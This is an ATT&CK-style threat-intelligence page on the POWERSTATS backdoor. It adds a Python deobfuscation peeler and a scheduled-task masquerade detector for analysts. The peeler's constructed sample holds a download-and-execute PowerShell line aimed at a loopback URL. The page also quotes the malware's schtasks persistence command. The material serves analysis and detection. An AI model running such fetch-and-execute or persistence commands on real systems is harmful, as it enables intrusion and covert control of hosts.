POWERSTATS

POWERSTATS is a PowerShell-based first-stage backdoor used by MuddyWater.[1]

ID: S0223
Associated Software: Powermud
Type: MALWARE
Platforms: Windows
Version: 2.3
Created: 18 April 2018
Last Modified: 22 March 2023

Associated Software Descriptions

Name Description
Powermud [2]

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows Management Instrumentation

POWERSTATS can use WMI queries to retrieve data from compromised hosts.[3][4]

Enterprise T1005 Data from Local System

POWERSTATS can upload files from compromised hosts.[3]

Enterprise T1090 .002 Proxy: External Proxy

POWERSTATS has connected to C2 servers through proxies.[3]

Enterprise T1036 .004 Masquerading: Masquerade Task or Service

POWERSTATS has created a scheduled task named "MicrosoftEdge" to establish persistence.[4]

Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

POWERSTATS has encrypted C2 traffic with RSA.[3]

Enterprise T1140 Deobfuscate/Decode Files or Information

POWERSTATS can deobfuscate the main backdoor code.[4]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

POWERSTATS uses PowerShell for obfuscation and execution.[1][4][5][6]

.005 Command and Scripting Interpreter: Visual Basic

POWERSTATS can use VBScript (VBE) code for execution.[4][5]

.007 Command and Scripting Interpreter: JavaScript

POWERSTATS can use JavaScript code for execution.[4]

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

POWERSTATS can disable Microsoft Office Protected View by changing Registry keys.[3]

Enterprise T1113 Screen Capture

POWERSTATS can retrieve screenshots from compromised hosts.[3][5]

Enterprise T1132 .001 Data Encoding: Standard Encoding

POWERSTATS encoded C2 traffic with base64.[1]

Enterprise T1027 .001 Obfuscated Files or Information: Binary Padding

POWERSTATS has used useless code blocks to counter analysis.[5]

.010 Obfuscated Files or Information: Command Obfuscation

POWERSTATS uses character replacement, PowerShell environment variables, and XOR encoding to obfuscate code; its backdoor code is a multi-layer obfuscated, encoded, and compressed blob.[3][4] POWERSTATS has also used PowerShell code with custom string obfuscation.[5]
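The following is an added analyst example, not POWERSTATS code and not from the cited reports, of peeling the kind of layered blob described above (base64 over compression over XOR-encoded script). The inner script, the single-byte XOR key (0x5A) and the layer order are constructed assumptions for illustration; the peeler does not handle character replacement or environment-variable tricks, which require reading the sample's own decoding stub.

```python
"""Peel base64 / gzip / raw-DEFLATE / single-byte-XOR layers off a PowerShell blob.

Added example. The sample blob is built here from a harmless constructed script
so the peeler can be run offline; XOR_KEY and the layer order are assumptions.
"""
import base64
import gzip
import re
import zlib

# Constructed stand-in for an inner stage; harmless but recognisably PowerShell.
INNER_SCRIPT = (
    "$u = 'http://127.0.0.1/stage2';\n"
    "$c = New-Object Net.WebClient;\n"
    "Invoke-Expression ($c.DownloadString($u));\n"
)
XOR_KEY = 0x5A  # assumed single-byte key used only for the constructed sample

B64_RE = re.compile(rb"\A[A-Za-z0-9+/]+={0,2}\Z")
# Tokens that mark a decoded layer as readable PowerShell (all 5+ chars, to avoid
# accidental hits when brute-forcing XOR keys).
PS_TOKENS = (b"New-Object", b"Invoke-", b"-join", b"[Convert]", b"DownloadString")


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def build_sample(compression: str = "gzip") -> bytes:
    """Wrap INNER_SCRIPT innermost-first: XOR, then gzip or raw DEFLATE, then base64."""
    layer = xor_bytes(INNER_SCRIPT.encode(), XOR_KEY)
    if compression == "gzip":
        layer = gzip.compress(layer)
    else:  # raw DEFLATE with no header, what .NET DeflateStream emits
        co = zlib.compressobj(9, zlib.DEFLATED, -15)
        layer = co.compress(layer) + co.flush()
    return base64.b64encode(layer)


def printable_ratio(data: bytes) -> float:
    ok = sum(1 for b in data if 0x20 <= b < 0x7F or b in b"\r\n\t")
    return ok / max(len(data), 1)


def looks_like_script(data: bytes) -> bool:
    return printable_ratio(data) > 0.98 and any(t in data for t in PS_TOKENS)


def try_raw_deflate(data: bytes):
    """Headerless DEFLATE has no magic; the only test is whether inflation succeeds."""
    try:
        return zlib.decompress(data, -15)
    except zlib.error:
        return None


def try_xor(data: bytes):
    """Brute-force a single-byte XOR key; keep the key whose output reads as PowerShell."""
    best = None
    for key in range(1, 256):
        out = xor_bytes(data, key)
        if looks_like_script(out):
            score = printable_ratio(out)
            if best is None or score > best[0]:
                best = (score, key, out)
    return best


def peel(blob: bytes, max_layers: int = 8):
    """Strip layers until a readable script appears; return (script, [layer names])."""
    data, layers = blob, []
    for _ in range(max_layers):
        if looks_like_script(data):
            return data.decode("ascii", "replace"), layers
        if data[:2] == b"\x1f\x8b":  # gzip magic
            data, layers = gzip.decompress(data), layers + ["gzip"]
            continue
        if B64_RE.match(data) and len(data) % 4 == 0:
            data, layers = base64.b64decode(data), layers + ["base64"]
            continue
        inflated = try_raw_deflate(data)
        if inflated is not None:
            data, layers = inflated, layers + ["deflate"]
            continue
        hit = try_xor(data)
        if hit is None:
            break
        data, layers = hit[2], layers + [f"xor:0x{hit[1]:02x}"]
    return None, layers


if __name__ == "__main__":
    for mode in ("gzip", "deflate"):
        script, layers = peel(build_sample(mode))
        print(mode, "->", layers)
        print(script)
```

The order of checks matters: readable script first (so the loop stops), then the two encodings with recognisable structure (gzip magic, base64 alphabet), then headerless DEFLATE, and the XOR brute force last because it is the only step that can produce a false positive.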

Enterprise T1070 .004 Indicator Removal: File Deletion

POWERSTATS can delete all files on the C:\, D:\, E:\, and F:\ drives using PowerShell Remove-Item commands.[3]

Enterprise T1218 .005 System Binary Proxy Execution: Mshta

POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.[3]

Enterprise T1082 System Information Discovery

POWERSTATS can retrieve OS name/architecture and computer/domain name information from compromised hosts.[3][5]

Enterprise T1033 System Owner/User Discovery

POWERSTATS has the ability to identify the username on the compromised host.[5]

Enterprise T1016 System Network Configuration Discovery

POWERSTATS can retrieve IP, network adapter configuration information, and domain from compromised hosts.[3][5]

Enterprise T1087 .001 Account Discovery: Local Account

POWERSTATS can retrieve usernames from compromised hosts.[3]

Enterprise T1518 .001 Software Discovery: Security Software Discovery

POWERSTATS has detected security tools.[3]

Enterprise T1105 Ingress Tool Transfer

POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server.[3]

Enterprise T1057 Process Discovery

POWERSTATS has used get_tasklist to discover processes on the compromised host.[5]

Enterprise T1559 .001 Inter-Process Communication: Component Object Model

POWERSTATS can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.[3]

.002 Inter-Process Communication: Dynamic Data Exchange

POWERSTATS can use DDE to execute additional payloads on compromised hosts.[3]

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

POWERSTATS has established persistence through a scheduled task using the command "C:\Windows\system32\schtasks.exe" /Create /F /SC DAILY /ST 12:00 /TN MicrosoftEdge /TR "c:\Windows\system32\wscript.exe C:\Windows\temp\Windows.vbe".[4]
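As an added detection example (not MITRE's or the cited reports' code), the check below flags scheduled tasks that combine a first-party-looking name with an action that runs a script host from a user-writable path, which is exactly the shape of the schtasks command above (a task named MicrosoftEdge running wscript.exe on a .vbe in C:\Windows\temp). The task XML is constructed to match that command; it is the form schtasks writes to C:\Windows\System32\Tasks and that Windows Security event 4698 embeds in its TaskContent field. The lookalike-name list, the script-host list and the writable-path patterns are assumptions to be tuned per environment.

```python
"""Flag scheduled tasks whose name mimics a Microsoft component while the action
runs a script host from a user-writable location. Added example; the task XML
below is constructed to mirror the schtasks command quoted above, and the name,
host and path lists are assumptions.
"""
import ntpath
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Script hosts and proxy binaries an attacker-created task commonly points at (assumption).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
                "pwsh.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
# Task-name prefixes that imitate first-party software (assumption; extend locally).
LOOKALIKE_NAME = re.compile(r"^(microsoft|windows|office|edge|onedrive|defender)", re.I)
# Directories a standard user can write to (assumption).
USER_WRITABLE = re.compile(
    r"\\(temp|tmp|programdata|users\\public|users\\[^\\]+\\appdata)\\", re.I)

# Constructed task definition modelled on the quoted schtasks command
# (/SC DAILY /ST 12:00 /TN MicrosoftEdge /TR "wscript.exe C:\Windows\temp\Windows.vbe").
SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\MicrosoftEdge</URI></RegistrationInfo>
  <Triggers><CalendarTrigger>
    <StartBoundary>2018-04-18T12:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
  </CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>c:\Windows\system32\wscript.exe</Command>
    <Arguments>C:\Windows\temp\Windows.vbe</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed benign control: a first-party-looking updater task running from Program Files.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\MicrosoftEdgeUpdateTaskMachineUA</URI></RegistrationInfo>
  <Actions Context="Author"><Exec>
    <Command>C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe</Command>
    <Arguments>/ua /installsource scheduler</Arguments>
  </Exec></Actions>
</Task>"""


def assess_task(task_xml: str) -> dict:
    """Return the task name, what it runs, the reasons it looks off, and a verdict."""
    root = ET.fromstring(task_xml)
    uri = root.findtext("t:RegistrationInfo/t:URI", "", NS)
    name = uri.rsplit("\\", 1)[-1]
    reasons = []
    if LOOKALIKE_NAME.match(name):
        reasons.append("lookalike-name")
    actions = []
    for act in root.findall("t:Actions/t:Exec", NS):
        cmd = act.findtext("t:Command", "", NS).strip('"')
        args = act.findtext("t:Arguments", "", NS)
        actions.append(f"{cmd} {args}".strip())
        if ntpath.basename(cmd).lower() in SCRIPT_HOSTS:
            reasons.append("script-host")
        if USER_WRITABLE.search(cmd) or USER_WRITABLE.search(args):
            reasons.append("user-writable-path")
    # A first-party-looking name on its own is normal (Edge and Office updaters use
    # them); it only indicates masquerading when the action is a script host or
    # lives somewhere a user can write.
    masquerading = "lookalike-name" in reasons and len(reasons) > 1
    return {"name": name, "actions": actions, "reasons": reasons,
            "masquerading": masquerading}


if __name__ == "__main__":
    for doc in (SUSPICIOUS_TASK_XML, BENIGN_TASK_XML):
        print(assess_task(doc))
```

Run it over every file under C:\Windows\System32\Tasks (or over the TaskContent of collected 4698 events) and review the hits; the name check alone would flood you with legitimate updater tasks, which is why the verdict requires the name to be paired with a script host or a writable path.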

Enterprise T1029 Scheduled Transfer

POWERSTATS can sleep for a given number of seconds.[3]

Groups That Use This Software

ID Name References
G0069 MuddyWater [1][3][4][2][7]

References